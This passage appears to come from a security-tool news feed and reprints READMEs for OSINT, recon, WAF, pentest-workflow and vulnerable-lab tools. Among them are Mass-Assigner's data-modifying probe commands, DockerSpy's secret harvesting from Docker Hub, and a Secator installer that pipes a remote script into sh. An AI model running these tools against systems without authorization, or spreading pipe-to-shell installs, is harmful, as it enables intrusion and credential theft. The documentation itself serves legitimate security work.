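        build_add_ip_url(api_server, ip, hostname, apikey, comment),
        method="POST", headers={"accept": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)
```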

    You can see the swagger documentation on the following link

    http://api-server:8000/docs

    The .env configuration in detail

    DB=changeme
    JWT_SECRET=changeme
    PASSWORD_SALT=changeme
    PASSWORD_TOKEN_KEY=changeme
    OPENCTI_URL=changeme
    OPENCTI_TOKEN=changeme

    Sponsor This Project πŸ’–

    If you find this project helpful, consider supporting me through GitHub Sponsors



    PANO - Advanced OSINT Investigation Platform Combining Graph Visualization, Timeline Analysis, And AI Assistance To Uncover Hidden Connections In Data

    By: Unknown


    PANO is a powerful OSINT investigation platform that combines graph visualization, timeline analysis, and AI-powered tools to help you uncover hidden connections and patterns in your data.

    Getting Started

    1. Clone the repository:
    git clone https://github.com/ALW1EZ/PANO.git
    cd PANO

    2. Run the application:
    • Linux: ./start_pano.sh
    • Windows: start_pano.bat

    The startup script will automatically:
    • Check for updates
    • Set up the Python environment
    • Install dependencies
    • Launch PANO

    In order to use the Email Lookup transform, you need to log in with GHunt first. After starting PANO via the starter scripts:

    1. Activate the venv manually:
    • Linux: source venv/bin/activate
    • Windows: call venv\Scripts\activate
    2. See how to log in here

    πŸ’‘ Quick Start Guide

    1. Create Investigation: Start a new investigation or load an existing one
    2. Add Entities: Drag entities from the sidebar onto the graph
    3. Discover Connections: Use transforms to automatically find relationships
    4. Analyze: Use timeline and map views to understand patterns
    5. Save: Export your investigation for later use

    πŸ” Features

    πŸ•ΈοΈ Core Functionality

    • Interactive Graph Visualization
    • Drag-and-drop entity creation
    • Multiple layout algorithms (Circular, Hierarchical, Radial, Force-Directed)
    • Dynamic relationship mapping
    • Visual node and edge styling

    • Timeline Analysis

    • Chronological event visualization
    • Interactive timeline navigation
    • Event filtering and grouping
    • Temporal relationship analysis

    • Map Integration

    • Geographic data visualization
    • Location-based analysis
    • Interactive mapping features
    • Coordinate plotting and tracking

    🎯 Entity Management

    • Supported Entity Types
    • πŸ“§ Email addresses
    • πŸ‘€ Usernames
    • 🌐 Websites
    • πŸ–ΌοΈ Images
    • πŸ“ Locations
    • ⏰ Events
    • πŸ“ Text content
    • πŸ”§ Custom entity types

    πŸ”„ Transform System

    • Email Analysis
    • Google account investigation
    • Calendar event extraction
    • Location history analysis
    • Connected services discovery

    • Username Analysis

    • Cross-platform username search
    • Social media profile discovery
    • Platform correlation
    • Web presence analysis

    • Image Analysis

    • Reverse image search
    • Visual content analysis
    • Metadata extraction
    • Related image discovery

    πŸ€– AI Integration

    • PANAI
    • Natural language investigation assistant
    • Automated entity extraction and relationship mapping
    • Pattern recognition and anomaly detection
    • Multi-language support
    • Context-aware suggestions
    • Timeline and graph analysis

    🧩 Core Components

    πŸ“¦ Entities

    Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:

    • Built-in Types
    • πŸ“§ Email: Email addresses with service detection
    • πŸ‘€ Username: Social media and platform usernames
    • 🌐 Website: Web pages with metadata
    • πŸ–ΌοΈ Image: Images with EXIF and analysis
    • πŸ“ Location: Geographic coordinates and addresses
    • ⏰ Event: Time-based occurrences
    • πŸ“ Text: Generic text content

    • Properties System

    • Type-safe property validation
    • Automatic property getters
    • Dynamic property updates
    • Custom property types
    • Metadata support

    ⚑ Transforms

    Transforms are automated operations that process entities to discover new information and relationships:

    • Operation Types
    • πŸ” Discovery: Find new entities from existing ones
    • πŸ”— Correlation: Connect related entities
    • πŸ“Š Analysis: Extract insights from entity data
    • 🌐 OSINT: Gather open-source intelligence
    • πŸ”„ Enrichment: Add data to existing entities

    • Features

    • Async operation support
    • Progress tracking
    • Error handling
    • Rate limiting
    • Result validation

    πŸ› οΈ Helpers

    Helpers are specialized tools with dedicated UIs for specific investigation tasks:

    • Available Helpers
    • πŸ” Cross-Examination: Analyze statements and testimonies
    • πŸ‘€ Portrait Creator: Generate facial composites
    • πŸ“Έ Media Analyzer: Advanced image processing and analysis
    • πŸ” Base Searcher: Search near places of interest
    • πŸ”„ Translator: Translate text between languages

    • Helper Features

    • Custom Qt interfaces
    • Real-time updates
    • Graph integration
    • Data visualization
    • Export capabilities

    πŸ‘₯ Contributing

    We welcome contributions! To contribute to PANO:

    1. Fork the repository at https://github.com/ALW1EZ/PANO/
    2. Make your changes in your fork
    3. Test your changes thoroughly
    4. Create a Pull Request to our main branch
    5. In your PR description, include:
    6. What the changes do
    7. Why you made these changes
    8. Any testing you've done
    9. Screenshots if applicable

    Note: We use a single main branch for development. All pull requests should be made directly to main.

    πŸ“– Development Guide

    Click to expand development documentation

    System Requirements

    • Operating System: Windows or Linux
    • Python 3.11+
    • PySide6 for GUI
    • Internet connection for online features

    Custom Entities

    Entities are the core data structures in PANO. Each entity represents a piece of information with specific properties and behaviors. To create a custom entity:

    1. Create a new file in the `entities` folder (e.g., `entities/phone_number.py`)
    2. Implement your entity class:
    from dataclasses import dataclass
    from typing import ClassVar
    from .base import Entity

    @dataclass
    class PhoneNumber(Entity):
        name: ClassVar[str] = "Phone Number"
        description: ClassVar[str] = "A phone number entity with country code and validation"

        def init_properties(self):
            """Initialize phone number properties"""
            self.setup_properties({
                "number": str,
                "country_code": str,
                "carrier": str,
                "type": str,  # mobile, landline, etc.
                "verified": bool
            })

        def update_label(self):
            """Update the display label"""
            self.label = self.format_label(["country_code", "number"])
    Custom Transforms

    Transforms are operations that process entities and generate new insights or relationships. To create a custom transform:

    1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`)
    2. Implement your transform class:
    from dataclasses import dataclass
    from typing import ClassVar, List
    from .base import Transform
    from entities.base import Entity
    from entities.phone_number import PhoneNumber
    from entities.location import Location
    from ui.managers.status_manager import StatusManager

    @dataclass
    class PhoneLookup(Transform):
        name: ClassVar[str] = "Phone Number Lookup"
        description: ClassVar[str] = "Lookup phone number details and location"
        input_types: ClassVar[List[str]] = ["PhoneNumber"]
        output_types: ClassVar[List[str]] = ["Location"]

        async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
            if not isinstance(entity, PhoneNumber):
                return []

            status = StatusManager.get()
            operation_id = status.start_loading("Phone Lookup")

            try:
                # Your phone number lookup logic here
                # Example: query an API for phone number details
                location = Location(properties={
                    "country": "Example Country",
                    "region": "Example Region",
                    "carrier": "Example Carrier",
                    "source": "PhoneLookup transform"
                })

                return [location]

            except Exception as e:
                status.set_text(f"Error during phone lookup: {str(e)}")
                return []

            finally:
                status.stop_loading(operation_id)
    Custom Helpers

    Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper:

    1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`)
    2. Implement your helper class:
    from PySide6.QtWidgets import (
        QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
        QTextEdit, QLabel, QComboBox
    )
    from .base import BaseHelper
    from qasync import asyncSlot

    class DummyHelper(BaseHelper):
        """A dummy helper for testing"""

        name = "Dummy Helper"
        description = "A dummy helper for testing"

        def setup_ui(self):
            """Initialize the helper's user interface"""
            # Create input text area
            self.input_label = QLabel("Input:")
            self.input_text = QTextEdit()
            self.input_text.setPlaceholderText("Enter text to process...")
            self.input_text.setMinimumHeight(100)

            # Create operation selector
            operation_layout = QHBoxLayout()
            self.operation_label = QLabel("Operation:")
            self.operation_combo = QComboBox()
            self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
            operation_layout.addWidget(self.operation_label)
            operation_layout.addWidget(self.operation_combo)

            # Create process button
            self.process_btn = QPushButton("Process")
            self.process_btn.clicked.connect(self.process_text)

            # Create output text area
            self.output_label = QLabel("Output:")
            self.output_text = QTextEdit()
            self.output_text.setReadOnly(True)
            self.output_text.setMinimumHeight(100)

            # Add widgets to main layout
            self.main_layout.addWidget(self.input_label)
            self.main_layout.addWidget(self.input_text)
            self.main_layout.addLayout(operation_layout)
            self.main_layout.addWidget(self.process_btn)
            self.main_layout.addWidget(self.output_label)
            self.main_layout.addWidget(self.output_text)

            # Set dialog size
            self.resize(400, 500)

        @asyncSlot()
        async def process_text(self):
            """Process the input text based on selected operation"""
            text = self.input_text.toPlainText()
            operation = self.operation_combo.currentText()

            if operation == "Uppercase":
                result = text.upper()
            elif operation == "Lowercase":
                result = text.lower()
            else:  # Title Case
                result = text.title()

            self.output_text.setPlainText(result)

    πŸ“„ License

    This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.

    You are free to:

    • βœ… Share: Copy and redistribute the material
    • βœ… Adapt: Remix, transform, and build upon the material

    Under these terms:

    • ℹ️ Attribution: You must give appropriate credit
    • 🚫 NonCommercial: No commercial use
    • πŸ”“ No additional restrictions

    πŸ™ Acknowledgments

    Special thanks to all library authors and contributors who made this project possible.

    πŸ‘¨β€πŸ’» Author

    Created by ALW1EZ with AI ❀️



    gitGRAB - This Tool Is Designed To Interact With The GitHub API And Retrieve Specific User Details, Repository Information, And Commit Emails For A Given User

    By: Unknown


    This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.


    Install Requests

    pip install requests

    Execute the program

    python3 gitgrab.py



    Lazywarden - Automatic Bitwarden Backup

    By: Unknown


    Secure, Automated, and Multi-Cloud Bitwarden Backup and Import System

    Lazywarden is a Python automation tool designed to Backup and Restore data from your vault, including Bitwarden attachments. It allows you to upload backups to multiple cloud storage services and receive notifications across multiple platforms. It also offers AES encrypted backups and uses key derivation with Argon2, ensuring maximum security for your data.


    Features

    • πŸ”’ Maximum Security: Data protection with AES-256 encryption and Argon2 key derivation.
    • πŸ”„ Automated Backups and Imports: Keep your Bitwarden vault up to date and secure.
    • βœ… Integrity Verification: SHA-256 hash to ensure data integrity on every backup.
    • ☁️ Multi-Cloud Support: Store backups to services such as Dropbox, Google Drive, pCloud, MEGA, NextCloud, Seafile, Storj, Cloudflare R2, Backblaze B2, Filebase (IPFS) and via SMTP.
    • πŸ–₯️ Local Storage: Save backups to a local path for greater control.
    • πŸ”” Real-Time Alerts: Instant notifications on Discord, Telegram, Ntfy and Slack.
    • πŸ—“οΈ Schedule Management: Integration with CalDAV, Todoist and Vikunja to manage your schedule.
    • 🐳 Easy Deployment: Quick setup with Docker Compose.
    • πŸ€– Full Automation and Custom Scheduling: Automatic backups with flexible scheduling options (daily, weekly, monthly, yearly). Integration with CalDAV, Todoist and Vikunja for complete tracking and email notifications.
    • πŸ”‘ Bitwarden Export to KeePass: Export Bitwarden items to a KeePass database (kdbx), including TOTP-seeded logins, URI, custom fields, card, identity attachments and secure notes.
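The derive-then-verify flow behind these features can be sketched as follows; note this uses the standard library's scrypt as a stand-in for Argon2 (Lazywarden's actual KDF) and shows only key derivation and the SHA-256 integrity digest, not the full AES-256 pipeline:

```python
import hashlib
import os

def derive_key(password: bytes, salt: bytes) -> bytes:
    # Lazywarden derives its AES key with Argon2; scrypt stands in here
    # because it ships with the Python standard library.
    return hashlib.scrypt(password, salt=salt, n=2**14, r=8, p=1, dklen=32)

def integrity_digest(backup: bytes) -> str:
    # SHA-256 digest recorded alongside each backup for integrity verification.
    return hashlib.sha256(backup).hexdigest()

salt = os.urandom(16)          # a fresh random salt per backup
key = derive_key(b"master-password", salt)
digest = integrity_digest(b"vault-export")
```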

    Platform CompatibilityΒ Β 



    Docf-Sec-Check - DockF-Sec-Check Helps To Make Your Dockerfile Commands More Secure

    By: Unknown


    DockF-Sec-Check helps to make your Dockerfile commands more secure.


    Done

    • [x] First-level security notification in the Dockerfile

    TODO List

    • [ ] Correctly detect the Dockerfile.
    • [ ] Second-level security notification in the Dockerfile.
    • [ ] Security notification in Docker images.
    • [ ] ***** (Private Repository)

    Installation

    From Source Code

    You can use virtualenv for package dependencies before installation.

    git clone https://github.com/OsmanKandemir/docf-sec-check.git
    cd docf-sec-check
    python setup.py build
    python setup.py install

    From Pypi

    The application is available on PyPI. To install with pip:

    pip install docfseccheck

    From Dockerfile

    You can run this application in a container after building the Dockerfile. You need to specify a path (YOUR-LOCAL-PATH) to the Dockerfile you want to scan on your local machine.

    docker build -t docfseccheck .
    docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile docfseccheck -f /docf-sec-check/Dockerfile

    From DockerHub

    docker pull osmankandemir/docfseccheck:v1.0
    docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile osmankandemir/docfseccheck:v1.0 -f /docf-sec-check/Dockerfile


    Usage

    -f DOCKERFILE [DOCKERFILE], --file DOCKERFILE [DOCKERFILE]
                          Dockerfile path, e.g. --file Dockerfile

    Function Usage

    from docfchecker import DocFChecker

    #Dockerfile is your file PATH.

    DocFChecker(["Dockerfile"])

    Development and Contribution

    See; CONTRIBUTING.md

    License

    Copyright (c) 2024 Osman Kandemir. Licensed under the GPL-3.0 License.

    Donations

    If you like DocF-Sec-Check and would like to show support, you can use the Buy A Coffee or GitHub Sponsors buttons below.

    Or

    Sponsor me : https://github.com/sponsors/OsmanKandemir 😊

    Your support will be much appreciated😊



    SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

    By: Unknown


    SafeLine is a self-hosted WAF(Web Application Firewall) to protect your web apps from attacks and exploits.

    A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, OS command injection, CRLF injection, LDAP injection, XPath injection, RCE, XXE, SSRF, path traversal, backdoors, brute force, HTTP flood, and bot abuse, among others.


    How It Works


    By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass through the WAF before reaching the server.

    A WAF protects your web apps by filtering, monitoring, and blocking malicious HTTP/S traffic traveling to the web application, and prevents unauthorized data from leaving the app. It does this by adhering to a set of policies that help determine which traffic is malicious and which is safe. Just as a proxy server acts as an intermediary to protect the identity of a client, a WAF operates in a similar fashion, acting as a reverse-proxy intermediary that protects the web app server from potentially malicious clients.
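At its crudest, the filtering idea reduces to matching requests against a policy before proxying them upstream; the sketch below is a naive signature check for illustration only, not SafeLine's actual detection engine, which performs far deeper HTTP analysis:

```python
import re

# Naive illustrative signatures; a real WAF parses full HTTP semantics
# instead of pattern-matching a single request line.
BLOCK_PATTERNS = [
    re.compile(r"(?i)\bunion\b.*\bselect\b"),  # crude SQL injection marker
    re.compile(r"(?i)<script\b"),              # crude XSS marker
    re.compile(r"\.\./"),                      # crude path traversal marker
]

def is_malicious(request_line: str) -> bool:
    # Block the request if any signature matches.
    return any(p.search(request_line) for p in BLOCK_PATTERNS)
```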

    Its core capabilities include:

    • Defenses for web attacks
    • Proactive bot abused defense
    • HTML & JS code encryption
    • IP-based rate limiting
    • Web Access Control List

    Screenshots







    Get Live Demo

    FEATURES

    List of the main features as follows:

    • Block Web Attacks
    • Defends against all common web attacks, such as SQL injection, XSS, code injection, OS command injection, CRLF injection, XXE, SSRF, path traversal, and so on.
    • Rate Limiting
    • Defends your web apps against DoS attacks, brute-force attempts, traffic surges, and other types of abuse by throttling traffic that exceeds defined limits.
    • Anti-Bot Challenge
    • Anti-bot challenges protect your website from bot attacks: human users are allowed through, while crawlers and bots are blocked.
    • Authentication Challenge
    • When the authentication challenge is turned on, visitors must enter a password, otherwise they are blocked.
    • Dynamic Protection
    • When dynamic protection is turned on, the HTML and JS code served by your web server is dynamically encrypted on each visit.


    Secator - The Pentester'S Swiss Knife

    By: Unknown


    secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


    Features

    • Curated list of commands

    • Unified input options

    • Unified output schema

    • CLI and library usage

    • Distributed options with Celery

    • Complexity from simple tasks to complex workflows

    • Customizable


    Supported tools

    secator integrates the following tools:

    Name Description Category
    httpx Fast HTTP prober. http
    cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
    gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
    gospider Fast web spider written in Go. http/crawler
    katana Next-generation crawling and spidering framework. http/crawler
    dirsearch Web path discovery. http/fuzzer
    feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
    ffuf Fast web fuzzer written in Go. http/fuzzer
    h8mail Email OSINT and breach hunting tool. osint
    dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
    dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
    subfinder Fast subdomain finder. recon/dns
    fping Find alive hosts on local networks. recon/ip
    mapcidr Expand CIDR ranges into IPs. recon/ip
    naabu Fast port discovery tool. recon/port
    maigret Hunt for user accounts across many websites. recon/user
    gf A wrapper around grep to avoid typing common patterns. tagger
    grype A vulnerability scanner for container images and filesystems. vuln/code
    dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
    msfconsole CLI to access and work with the Metasploit Framework. vuln/http
    wpscan WordPress Security Scanner vuln/multi
    nmap Vulnerability scanner using NSE scripts. vuln/multi
    nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
    searchsploit Exploit searcher. exploit/search

    Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't, but you still want to integrate it into secator, you can plug it in (see the dev guide).

    Installation

    Installing secator

    Pipx

    pipx install secator

    Pip

    pip install secator

    Bash

    wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh

    Docker

    docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help

    The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run:

    alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"

    Now you can run secator as if it were installed on bare metal:

    secator --help

    Docker Compose

    git clone https://github.com/freelabz/secator
    cd secator
    docker-compose up -d
    docker-compose exec secator secator --help

    Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

    Installing languages

    secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

    We provide utilities to install required languages if you don't manage them externally:

    Go

    secator install langs go

    Ruby

    secator install langs ruby

    Installing tools

    secator does not install any of the external tools it supports by default.

    We provide utilities to install or update each supported tool which should work on all systems supporting apt:

    All tools

    secator install tools

    Specific tools

    secator install tools <TOOL_NAME>

    For instance, to install `httpx`, use:

    secator install tools httpx

    Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

    Installing addons

    secator comes installed with the minimum amount of dependencies.

    There are several addons available for secator:

    worker: adds support for Celery workers (see Distributed runs with Celery: https://docs.freelabz.com/in-depth/distributed-runs-with-celery).

    secator install addons worker

    google: adds support for the Google Drive exporter (`-o gdrive`).

    secator install addons google

    mongodb: adds support for the MongoDB driver (`-driver mongodb`).

    secator install addons mongodb

    redis: adds support for the Redis backend (Celery).

    secator install addons redis

    dev: adds development tools like `coverage` and `flake8`, required for running tests.

    secator install addons dev

    trace: adds tracing tools like `memray` and `pyinstrument`, required for tracing functions.

    secator install addons trace

    build: adds `hatch`, for building and publishing the PyPI package.

    secator install addons build

    Install CVEs

    secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

    secator install cves

    Checking installation health

    To figure out which languages or tools are installed on your system (along with their version):

    secator health

    Usage

    secator --help


    Usage examples

    Run a fuzzing task (ffuf):

    secator x ffuf http://testphp.vulnweb.com/FUZZ

    Run a url crawl workflow:

    secator w url_crawl http://testphp.vulnweb.com

    Run a host scan:

    secator s host mydomain.com

    and more... to list all tasks / workflows / scans that you can use:

    secator x --help
    secator w --help
    secator s --help

    Learn more

    To go deeper with secator, check out:

    • Our complete documentation
    • Our getting started tutorial video
    • Our Medium post
    • Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



    Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

    By: Unknown


    The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


      About the Damn Vulnerable Drone


      What is the Damn Vulnerable Drone?

      The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

      Why was it built?

      The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

      Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

      The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

      How does it work?

      The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

      ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.

      While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

      Features

      • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
      • Simulated Wireless Networking: Simulated Wifi (802.11) interfaces to practice wireless drone attacks.
      • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
      • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
      • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
      • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
      • Dynamic Flight Logging: Fully dynamic Ardupilot flight bin logs stored on a simulated SD Card.
      • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
      • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
      • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


      Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests

      By: Unknown


      Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.


      Disclaimer

      This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.

      Features

      • Enables the addition of custom headers within requests
      • Offers customization of various HTTP methods for both origin and target requests
      • Supports rate-limiting to manage request thresholds effectively
      • Provides the option to specify "ignored parameters" which the tool will ignore during execution
      • Improved support for nested arrays/objects inside JSON response data

      What's Next

      • Support additional content types, such as "application/x-www-form-urlencoded"

      Installation & Usage

      Install requirements

      pip3 install -r requirements.txt

      Run the script

      python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"

      Arguments

      Mass Assigner accepts the following arguments:

        -h, --help            show this help message and exit
        --fetch-from FETCH_FROM
                              URL to fetch data from
        --target-req TARGET_REQ
                              URL to send modified data to
        -H HEADER, --header HEADER
                              Add a custom header. Format: 'Key: Value'
        -p PROXY, --proxy PROXY
                              Use a proxy, e.g.: http://127.0.0.1:8080
        -d DATA, --data DATA  Add data to the request body. JSON is supported with escaping.
        --rate-limit RATE_LIMIT
                              Number of requests per second
        --source-method SOURCE_METHOD
                              HTTP method for the initial request. Default is GET.
        --target-method TARGET_METHOD
                              HTTP method for the modified request. Default is PUT.
        --ignore-params IGNORE_PARAMS
                              Parameters to ignore during modification, separated by comma.

      Example Usage:

      python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'



      Imperius - Make An Linux Kernel Rootkit Visible Again

      By: Unknown


      Makes an LKM rootkit visible again.

      This tool is part of research on LKM rootkits that will be published soon.


      It involves getting the memory address of a rootkit function such as "show_module" and using it to call that function, adding the rootkit back to lsmod and making it possible to remove it.

      On recent kernels we can obtain the function address from /sys/kernel/tracing/available_filter_functions_addrs; however, that file is only available from kernel 6.5 onwards.
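Assuming the file's `address name [module]` line format, the lookup can be sketched in Python. The module and function names below are hypothetical:

```python
def find_function_addr(lines, func_name):
    """Scan lines in the 'address name [module]' format of
    available_filter_functions_addrs and return the address, or None."""
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and parts[1] == func_name:
            return int(parts[0], 16)
    return None

# Hypothetical file contents (on a real >= 6.5 kernel you would read
# /sys/kernel/tracing/available_filter_functions_addrs as root)
sample = [
    "ffffffffc0a01000 hide_module [rootkit]",
    "ffffffffc0a01200 show_module [rootkit]",
]
addr = find_function_addr(sample, "show_module")
print(hex(addr))
```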

      An alternative is to scan kernel memory for the function and then add the rootkit back to lsmod so it can be removed.

      In summary, this LKM abuses the "become visible again" functionality that many LKM rootkits implement.

      Note: there is another trick for removing/defusing an LKM rootkit, but it will be covered in the upcoming research.



      DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

      By: Unknown


      DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


      What is Docker?

      Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

      About Docker Hub

      Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

      Why OSINT on Docker Hub?

      Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

      1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

      2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

      3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

      4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

      5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

      Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

      How DockerSpy Works

      DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
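A minimal sketch of this regex-based inspection in Python. The two patterns are illustrative only; DockerSpy ships its own configurable set:

```python
import re

# Two illustrative patterns -- DockerSpy's real set is configurable
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def scan_content(text):
    """Return {pattern_name: [matches]} for every pattern found in text."""
    hits = {}
    for name, pattern in PATTERNS.items():
        found = pattern.findall(text)
        if found:
            hits[name] = found
    return hits

# Hypothetical content extracted from an image layer
layer_text = "ENV AWS_KEY=AKIAIOSFODNN7EXAMPLE\n-----BEGIN RSA PRIVATE KEY-----"
print(scan_content(layer_text))
```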

      Getting Started

      To use DockerSpy, follow these steps:

      1. Installation: Clone the DockerSpy repository and install the required dependencies.
      git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
      2. Usage: Run DockerSpy from the terminal.
      dockerspy

      Custom Configurations

      To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions

      Disclaimer

      DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

      Contribution

      Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

      About the Author

      DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

      I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

      Consider following me:



      Thanks

      Special thanks to @akaclandestine



      Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

      By: Unknown


      Reconnaissance is the first phase of penetration testing: gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and the Wayback crawling machine.



      Main Features

      - Wayback Crawler Machine
      - Google Dorking without limits
      - Github Information Grabbing
      - Subdomain Identifier
      - Cms/Technology Detector With Custom Headers

      Installation

      ~> git clone https://github.com/ankitdobhal/Ashok
      ~> cd Ashok
      ~> python3.7 -m pip install -r requirements.txt

